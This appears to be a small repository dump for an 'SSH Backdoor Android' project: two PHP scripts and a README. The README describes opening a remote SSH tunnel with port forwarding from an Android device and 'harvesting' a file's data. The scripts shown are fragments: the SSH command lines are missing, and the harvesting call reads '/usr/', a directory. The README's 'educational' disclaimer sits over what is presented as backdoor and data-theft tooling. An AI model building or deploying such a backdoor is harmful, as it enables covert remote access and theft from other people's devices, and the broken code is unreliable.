├── adb.php ├── exploit.php └── readme.md /adb.php: -------------------------------------------------------------------------------- 1 | array("pipe", "r"), 10 | 1 => array("pipe", "w"), 11 | 2 => array("pipe", "w") 12 | ); 13 | 14 | $process = proc_open($command, $descriptorspec, $pipes); 15 | if (is_resource($process)) { 16 | fclose($pipes[0]); 17 | $stdout = stream_get_contents($pipes[1]); 18 | $stderr = stream_get_contents($pipes[2]); 19 | fclose($pipes[1]); 20 | fclose($pipes[2]); 21 | $exit_code = proc_close($process); 22 | } 23 | 24 | // Check if the command was executed successfully 25 | if ($exit_code !== 0) { 26 | echo "Error executing the command: $stderr"; 27 | exit; 28 | } 29 | 30 | // Process the harvested data here 31 | echo $stdout; 32 | ?> 33 | -------------------------------------------------------------------------------- /exploit.php: -------------------------------------------------------------------------------- 1 | array("pipe", "r"), 10 | 1 => array("pipe", "w"), 11 | 2 => array("pipe", "w") 12 | ); 13 | 14 | $process = proc_open($command, $descriptorspec, $pipes); 15 | if (is_resource($process)) { 16 | fclose($pipes[0]); 17 | $stdout = stream_get_contents($pipes[1]); 18 | $stderr = stream_get_contents($pipes[2]); 19 | fclose($pipes[1]); 20 | fclose($pipes[2]); 21 | $exit_code = proc_close($process); 22 | } 23 | 24 | // Check if the command was executed successfully 25 | if ($exit_code !== 0) { 26 | echo "Error executing the command: $stderr"; 27 | exit; 28 | } 29 | 30 | // Harvesting information (assuming you want to read a file that starts with "/usr") 31 | $data = file_get_contents('/usr/'); 32 | // Process the harvested data here 33 | ?> 34 | -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 | SSH Backdoor Android 2 | A simple PHP script that establishes a SSH backdoor connection to a remote server on Android devices. The script defines a command to execute a SSH connection using an SSH key and forward ports for remote access to a local server. It also includes a snippet for harvesting information from a file on the device. 3 | 4 | How it works 5 | The script uses proc_open to execute the SSH command and avoid shell injection. It also includes options for strict host key checking, TCP keepalive, and server alive interval to ensure the connection remains active. The script opens ports 80 and 8888 on the remote server and forwards them to ports 8080 on the local device. 6 | 7 | Usage 8 | To use this script, you need to modify the following variables: 9 | 10 | /path/to/ssh_key: the path to your SSH key 11 | /path/to/known_hosts_file: the path to your known hosts file 12 | '/usr/': the file path for the data you want to harvest 13 | Once you've updated these variables, upload the script to your Android device and run it. The script will establish a SSH connection to the remote server and forward the specified ports. It will also harvest data from the specified file path. 14 | 15 | Note that this script should only be used for educational and testing purposes. Using it to gain unauthorized access to a device or server is illegal and unethical. 16 | --------------------------------------------------------------------------------